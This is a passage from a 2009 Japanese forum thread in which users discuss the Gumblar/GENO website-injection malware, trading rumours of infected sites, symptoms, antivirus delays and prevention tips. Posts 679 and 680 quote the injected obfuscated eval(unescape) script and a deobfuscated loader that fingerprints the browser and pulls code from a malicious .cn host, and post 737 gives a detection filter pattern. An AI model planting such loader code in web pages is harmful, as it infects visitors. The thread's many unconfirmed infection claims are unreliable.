655 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:52:19 BE:1503380148-PLT(12500)] ドメイン的に発信源は中国と思ってたんだけど 中国じゃないの? ちなみにgumblar.cnはもう死んでるからいまさらこのドメインブロックしても意味ないんだよね
656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:52:22 ] なんだなんだ 結局GoogleChromeが最強のブラウザ決定?
657 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:52:32 ] >>631 参考にしてみる ありがとう
658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:52:34 ] >>645 ほかの人うつす可能性があるだけで事実上無害 気にするだけ損なウィルス
659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:03 ] >>641 おお、そうなのか。複数出てくるのは普通なのか。 サイズが違うのはやっぱりまずい?
660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:25 ] >>656 Netscape
661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:37 ] >>655 gumblar.cnの設置場所はロシアだけど、犯人(グループ)がどこにいるかは わからんね。
662 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:42 ] Vista用のテンプレもなかったっけ? どこいった?
663 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:53:43 ] >>650 同じくFWだけで踏んできたが何か?
664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:55 ] >>655 別にドメインが中国でも実際に使ってるのは中国人じゃない可能性はあるだろ
665 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:53:57 ] >>658 豚インフルに似てるな
666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:08 ] いつ攻撃法をJavaScriptからActiveXへ変えるのだろうか
667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:16 ] サイト側が感染する時って どういう仕組みで感染するんですか?
668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:23 ] 知ってる範囲で感染サイトまとめくれ ν速じゃ4Gamerとか痛いニュースやYourFilehostが感染だの憶測が飛びまくってて分からん
669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:54:31 ] いつになったらおさまるのだろうか 対策はしているがまた亜種が出てきたらどうしようかとか色々考えてしまう
670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:55:31 ] >>667 スクリプト踏んで感染したPCからftpパスワードを抜かれる
671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:55:52 ] 最新の検体だとF-Secureひっかからないのか… とりあえずSASに記録しとくか…
672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:56:33 ] ノートンじゃ反応しないらしいからオンラインスキャンしたいんだけどどこ使えばいいのか
673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:05 ] 火スペ!
674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:10 ] >>658 え・・・?
675 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:26 ] >>658 * コマンドプロンプトを実行中ではないのにcmd.exeが起動している * cmdやregeditが起動しない(Explorerが落ちる) * 特定のサイトに接続できなくなる * ブラウジングがまともにできない * Adobeが5分に1回のペースで更新を要求してくる * CPUの稼働率が何も作業していないのに50%近くに上がる(CPUのコア数によって違う) こんな症状が報告されてるがな 愚痴。 判りもしないで騒ぐなって馬鹿いるけど、だったらウイルスの挙動を完全に解析してくれ。 それができない・亜種が発生し続けてるから何されるか完全に把握できないってのに。
676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:26 ] >>648 Chromeにはあるんじゃね?
677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:57:54 ] >>972 カスペルスキー www.kaspersky.co.jp/virusscanner 感染してたらこれが検出 dec.2chan.net:81/may/b/src/1242482913269.jpg
678 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 23:58:06 ] fc2ブログ見れなくなった… 俺だけでしょうか?
679 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:24 ] search.chiebukuro.yahoo.co.jp/search/search.php?flg=3&p=eval+unescape HTMLにいつのまにか謎の文字列が挿入されています。 ...2fsc:72ipt:3e:22):3b:7d'; var Mdpko=FPCN.replace(Y3n5P,MRfH);eval(unescape(Mdpko))})(/:/g); --></script> ヨミサーチを設置後、htmlソースがおかしくなりました。 スクリプト記述部が <script language=javascript><!-- (function(t){eval(unescape 感染広がりまくりwwwwwうぇwwwwwww
680 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:32 ] var j = "", u = navigator.userAgent; if( (u.indexOf("Chrome")<0) && //Chrome以外ならtrue (u.indexOf("Win")>0) && //Windowsならtrue (u.indexOf("NT 6")<0) && //WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0) (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ){ zrvzts="A"; if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列(詳しくはググれ) } document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し } 更に読みやすくしてコメント付けてみた IEでVBScript使えないと動かないっぽいね
681 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:33 ] 一週間くらいでワクチン対応くるかな
682 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 23:58:37 ] >>672 オンラインスキャンでも最新亜種は検出しないよ。 検体を提出してもクリーン判定されちゃうもの。
683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:00:19 ] >>672 カスぺとかじゃない… なんかもうどのソフトも後手後手だから、予防対策とっておとなしくしてるわ… 亜種出まくりだし。 なんか変な感じするなぁ。
684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:00 ] 恐らくワクチンが出来るまでに>>681 はあぼーんする可能性99.8%
685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:00 ] >>675 UPX解凍しても中身が全部見えない u.batの挙動は海外サイトで纏められてるが、残念ながら不明
686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:01 ] 夜になって急に騒がしくなってきたな
687 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:01:18 BE:1127535146-PLT(12500)] >>664 中国人が発信源じゃなくて、中国が発信源と思ってたの
688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:30 ] コキントーとかの私用パソコンが感染したらどうなるんだろか? 犯人が中国人だったら死刑だろーなw
689 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:01:54 ] そりゃまあ対策ソフトなんだし先手はありえんな
690 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:10 ] OperaでJS、Java、FlashとReaderのプラグインを切る、これ最強
691 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:13 ] >>675 亜種っていっても、FlashとPDFの脆弱性を利用しているという点ではずっと一貫してると思うんだが。 だから呼びかけられてる予防方法はずっと変わってないだろ。 つーかそこに挙がってる症状は、とりあえず感染の目安になるってだけじゃないのか。 問題はトロイを仕込まれるってとこなんじゃないか?
692 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:31 ] 少なくともGENOで確認されて一月経過してて、他所ではもっと前から感染してるのに、 一向に対策が進まない現状
693 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:36 ] もうわけわからん
694 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:02:37 ] これ外国でも騒ぎになってるのか?
695 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:38 ] UACの偉大さ
696 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:52 ] >>675 とくに深刻な症状でもないね 気にするだけ無駄ってのが正解かも キンタマで人生終わるとかじゃないからw
697 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:02:54 ] fc2はfc2ブログだけじゃなく、fc2.comも開けなくなってるな。 fc2.comの管理者が食らってメンテ中か?
698 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:06 ] >>680 違う。 IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。 その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。 その違いだけ。
699 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:17 ] >>687 www.trendmicro.com/vinfo/images/DOWNAD_AD/AD_01.jpg ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。 例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や ".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、 URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。
700 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:40 ] >>635 IE8でも、検索サイトをGoogleに設定しているとそうなるらしいけど、 俺は怖くて試していない
701 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:03:44 ] >>678 同人板でも話題になってた いつものことなのかそうでないのかの判断がつかない状況
702 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:04:00 ] なんか火消しに奔走する奴が出始めたな どこかの関係者か?
703 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:04:19 ] ソースチェッカーオンラインが「アクセス規制中です 現在、大規模な攻撃を受けており」だってさ 同人板の連中が殺到してんだな・・・乙
704 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:04:53 ] そもそも犯人の目的は何なんだ?
705 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:12 ] >>704 おまいのアナル
706 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:12 ] GENOの人居るんでしょ? ちゃんと責任取ってよね キャッシュ消せば大丈夫とかよくも大嘘こいてくれたな
707 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:41 ] >>704 Vistaの普及
708 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:47 ] ブルスク気にしないのか
709 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:48 ] genoはどんどん名が売れていくな よかったじゃんw
710 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:05:52 ] とにかくjs切ってサイト閲覧してれば大丈夫ってことだよね?
711 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:06:01 ] >>704 目的の一つはアフィ。 検索結果のリンク先を書き換えるらしい。
712 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:06:10 ] 同人同人騒いでるのってあの人でしょ
713 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:06:14 ] 結局vistaなら大丈夫なの?
714 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:06:45 ] >>707 俺すでにびすたんだよ
715 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:06:59 ] >>695 この間仕方なしにVistaに変えたけどそれオンにしていたら どんな警告出るの?
716 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:34 ] >>710 今のところはね。 いつまでもjavascriptだけとは思えないけどね。 javascriptのバージョン判定部分なんかも書き方変わってきてるし。
717 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:35 ] >>696 ゾンビになって犯罪に加担することになります ある日警察がきます
718 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:40 ] >>704 大規模なボットネットを手に入れるためじゃない その手の世界では結構な高額で売れるんだとか GENOウイルス自体は感染を広める為だけの物だから解釈によっては無害とか言うことも可能なんだろう でもゾンビ化してるから後から遠隔操作で何されるかはわからん
719 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:44 ] >>706 /) □ ///) □ /,.=゙''"/ □ / i f ,.r='"-‐'つ____ 角砂糖3個やろう / / _,.-‐'~/⌒ ⌒\ / ,i ,二ニ⊃( ●). (●)\ / ノ il゙フ::::::⌒(__人__)⌒::::: \ ,イ「ト、 ,!,!| |r┬-| | / iトヾヽ_/ィ"\ `ー'´ /
720 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:47 ] >>711 もしそうなら(相手が大規模な詐欺グループでないなら)簡単に身元割れるんじゃね?
721 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:47 ] chromeも>>635 みたいに弾いてくれるのか? chromeはjs不許可にできないから試せない・・
722 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:07:55 ] >>713 UAC切ってるならXP同様感染する
723 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:09 ] とうぶんフラッシュは見ないことにしようと思ったんだが、 よく考えるとおとついadobeのフラッシュプレーヤー更新したとき以外 ここんとこ全然見る機会なかったわ。 捨ててもいい気がしてきたw
724 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:25 ] いやもうGENO潰れろよ 恨みを一身に背負ってさ
725 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:30 ] >>704 botnetのゾンビ集め で、そのnetを時間貸しでレンタルして金稼ぎ、らしい
726 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:34 ] 47 名前:GENO[] 投稿日:2009/05/16(土) 23:53:41 ID:yglYJEG80 4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ
727 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:37 ] ノートン先生まだ寝てるんだぜ?
728 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:08:38 ] 感染サイトまとめとかないの?
729 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:08:50 ] UACって何
730 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:05 ] >>689 ○○最強!なーんて言ってる場合じゃないなって… >>691 進まないな…不便になるのが嫌なのは分かるけどさ… 仕事で諸々をアップデート出来ないって人は大変だ。
731 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:29 ] >>726 それ確定情報ねーだろ
732 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:32 ] >>691 そうだよ、だから 簡潔に>>530 だけを>>1 に書いとけばいいだけ 馬鹿がテンプ色々付加するから混乱するんだよな 理解しきれてないから長文でしか説明できない馬鹿がスレタテるとこうなる。 ちなみに>>530 はおれが書いた
733 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:33 ] 故意にデマを広めると検挙されるケースもあるから注意な
734 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:45 ] Scriptからの挙動による対策 ・ Google Chromeを使う ・ Windows以外のOSを使う ・ Windows Vista以降のOSを使う ・ cookieをオフにする ・ JavaScriptをオフにする ・ Adobe Readerを使わない これのどれかを行えば今のところ感染しない
735 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:46 ] >>722 少なくとも現時点で明らかになっているスクリプトではVistaとChromeは 除外してるよ。
736 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:09:48 ] >>723 動画サイトいかないならおkじゃね
737 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:10 ] >>716 サンクス。 Geno騒動初期に手に入れたオミトロンのフィルタが 機能するかどうか試したんだけど、アラートはでなかった。 JsOffでも機能するよね? [Patterns] Name = "GENO Virus Killer" Active = TRUE Limit = 512 Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->" Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"
738 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:22 ] 中華のサイバーテロ演習
739 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:24 ] >>732 ゆとり乙 火消しのつもりか?
740 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:27 ] とにかく家族や他人様に迷惑かけないように ネットを切って働いて自立するべきだな
741 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:10:57 ] >>740 夜勤は来週からだ
742 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:00 ] >>728 ネットしなけりゃOK
743 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:11 ] あと、プニルで見たんだが、ちゃんとGoogleからの警告があったよ。 IE8でも警告されると思うが、念のためjs切ってみたほうがいい。
744 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:33 ] Vista使ってて初めて良かったと思った
745 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:11:34 ] GENOの対応はたしかに酷いが、ここまで広がってるのはもうGENO関係ないと思うぞ。 どっちかっていうとアップデートしてない人がこんなにいるのかって驚き。
746 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:01 ] >>737 document.writeの直後、unescapeのパターン以外にもいくつかあるよ。
747 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:12:06 ] amazonが感染したとかどっかで見たけど流石にデマだよなー
748 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:08 ] >>740 お願いだからお仕事休んでね!って会社が言うんだよお
749 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:30 ] >>734 Cookieは関係ないです、勘違いだった。
750 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:31 ] >>745 関係なくはない 小林みたいにしっかりと「ウィルスでしたごめんなさい」とすぐに書けば 感染した奴もすぐ対応できた
751 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:12:34 ] >>739 なんのための火消し? 中傷は反論じゃないですよ。 具体的にどうぞ。
752 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:12:42 ] >>743 ドメイン変わってスルーされてるって話だけど、どうかな
753 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:06 ] 47 名前:GENO[] 投稿日:2009/05/16(土) 23:53:41 ID:yglYJEG80 4gamerとファミ通が感染したぞーパンデミックじゃ(^o^)ノ これって本当?
754 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:24 ] こんなの全然問題じゃねえだろ!って情弱が逆切れし始めてんな。 PCにどれだけ飼ってるのか興味深い
755 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:33 ] www.kingsoft.jp/ ここも感染した?
756 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:13:37 ] >>743 googleから検索して開けばブロックされるに決まってるだろアホか 問題なのは普段見ているサイトが感染したとしてブックマークとかから直接アクセスした場合 firefoxはgoogleのDBから随時リストを更新している chromeはどうなんだ
757 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:11 ] >>755 お前もういい加減にしろ
758 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:16 ] >>752 Googleが危険判定したら別ドメインに逃げてるっぽいよな。
759 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:16 ] いつも見ているサイトももしかしたら感染するかもしれないし 気をつけないといけんね
760 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:28 ] >>751 この改行どっかで見たな ν速か
761 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:32 ] Nortonはなんで一向に対応しようとしないの?
762 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:14:54 ] >>753 見てみた。感染してない
763 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:00 ] 感染報告無いのに○○が感染してるって本当?という質問ずっと続ける奴はアレだな・・・
764 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:12 ] 先生は忙しいんだよ
765 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:16 ] >>745 へー で なんでキャッシュ消せば大丈夫とか書いちゃったの?
766 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:23 ] レジストリエディタの編集をしようとすると落ちる症状 (立ち上がるがkeyの変更をしようとすると落ちてた)が連発してたが、 まさかこれの亜種だったのだろうか。 NET.FRAMEワークのパッチあてて直ったんだよな。
767 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:32 ] >>761 国内担当が土日でお休みだからじゃね
768 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:48 ] >>761 たぶんエンジンに手を入れない限りシグネチャで対応しきれないから。
769 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:54 ] GENO社員が火消しに降臨したか
770 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:15:58 ] ・感染したらクリーンインスール ・予防はFlashとReaderを最新版に。 2行で済む話をなんで永遠8スレ消費してやってんの??
771 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:58 ] GENOは関係あるよ そのままキャッシュ消して普通にネットしてる人だっていただろうしさ
772 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:15:59 ] >>746 それじゃあアラートでないはずだ。
773 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:16:08 ] >>761 センセイは職場放棄しましたOTL
774 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:16:36 ] >>745
775 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:16:58 ] 先生ならさっきもう食べられないよーとか寝言言ってたぜ 早く起きていっぱい食えよコノヤロウ
776 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:00 ] GENOのせいだろどう見ても。ショップ閉鎖するべき。 パソコン直す店やったとしてもパソコンにコード仕込まれたら意味ないしなw
777 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:02 ] バスターも土日休みだっけ
778 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:03 ] >>761 先生は今敵に昏睡状態にされてるんだよきっと
779 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:07 ] >>770 ・感染サイトが増え続ける一方だから ・亜種が出てきたから ・GENOが火消ししようとするから
780 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:14 ] >>729 ユーザーアクセスコントロールだ。
781 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:33 ] reader更新しときゃいいんだよ 次スレいらないね
782 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:34 ] >>770 その2行がいつ無効になるか解らないからみんな常駐してるんだろ インフルエンザと同じだ
783 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:17:51 ] >>761 先生なら今俺の隣で寝てるぜ
784 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:07 ] つか、Flash関係ないし・・
785 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:08 ] おいwww新型インフルと、GENOスレを同時に見てるとこの先地獄しか想像できないんだがwww
786 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:14 ] 時限式とかないよね?ね?
787 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:25 ] VMwareでリボンマジックとwww■senlights■co■jp/seihin/kirenaru-1s■htmを踏んでみた リボンマジックの方はなんともなかったが、後者のサイトはPDFリーダーの起動とウイルスサイトへのアクセスを確認した。
788 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:34 ] >>770 馬鹿だろお前
789 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:36 ] >>761 バスケがしたいですぅ・・・・
790 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:40 ] >>782 感染したら〜はハードウェア破壊されない限りどのウィルスでも有効だと思う そもそも対処法じゃないけど
791 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:54 ] >>786 ありますん
792 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:18:55 ] >>785 外に出ても感染 家の中でも感染
793 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:00 ] なんか「I LOVE YOU」メール依頼の大流行になりそうな悪寒
794 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:07 ] google preview入れてるとサムネで教えてくれるんだな びびったわ
795 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:23 ] わしが育てた
796 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:31 ] >>761 先生を解放してあげようよ
797 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:37 ] >>782 経過観察って重要なんだな…
798 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:44 ] >>786 時限式と言うか、遠隔操作してるとこからいつでも弄れるからな。 いつ「始める」かは犯人次第なわけだ。 意味わかるよな?
799 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:45 ] GENO関係者が必死に火消しするのはなぜ?
800 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:19:54 ] 二次元に逃げるしかないな
801 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:20:44 ] 男に逃げるしかないな
802 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:20:51 ] >>793 2ちゃんに書き込むとノートン先生が飛び起きる魔法のコードですね
803 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:09 ] >>800 それだ!
804 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:26 ] >>753 今見てきたけど、それらしい痕跡は無かったけどな。
805 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:30 ] ドリクラの宣伝禁止
806 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:21:38 ] >>788 馬鹿の理由を みんなに伝わるようによろしく。 おまえよりはましだと思うけど。
807 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:21:56 ] F-Secure Security Labs から Thanks, we're publishing detection shortly. って回答
808 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:22:23 ] 宣伝効果絶大だわ ちっとまえまでGENOなんて知らなかったよ
809 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:22:26 ] ワトソン博士を忘れちゃいないか?
810 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:22:27 ] GENOの社員なんかじゃないよ、実際GENOの対応は酷いって書いただろ。 だけどGENOは責任なんかとっちゃくれないし、クリーンインストールしたりして損すんのは自分じゃんか。 ふだんから気をつけておくのにこしたことはないのにねって話したかっただけだよ。すまんね。
811 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:23:03 ] >>810 「関係ない」って書いたからあれだったんだろうね。
812 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:23:33 ] ノートン先生まだ刺身食ってる途中なんだぜ?
813 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:23:34 ] セキュ板のGENOスレが立った時に、ここ数年でも最凶レベルにやばいって書いたけど本当にやばそうだな
814 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:23:44 ] >>806 ageで無駄に行間空ける自己主張むき出しのレス馬鹿すぎる
815 名前:名無しさん@お腹いっぱい。 [2009/05/17(日) 00:24:09 ] >>799 責任逃れだろう
816 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:12 ] >>770 ×永遠 ○延々 ・感染した場合、少なくとも感染時に通信したFTPのPassを変更する必要がある ・ウィルスがFTP以外の通信ログを取っているかどうか不明
817 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:14 ] おいかまうなよ
818 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:22 ] fc2.com復帰した。ただのメンテだったのか?
819 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:24:40 ] >>810 あほの相手して損すんのは自分じゃんか。
820 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/17(日) 00:25:17 ] ウィルスばっかで嫌じゃぁああああああああああああああああああああ でもちょっと・・・
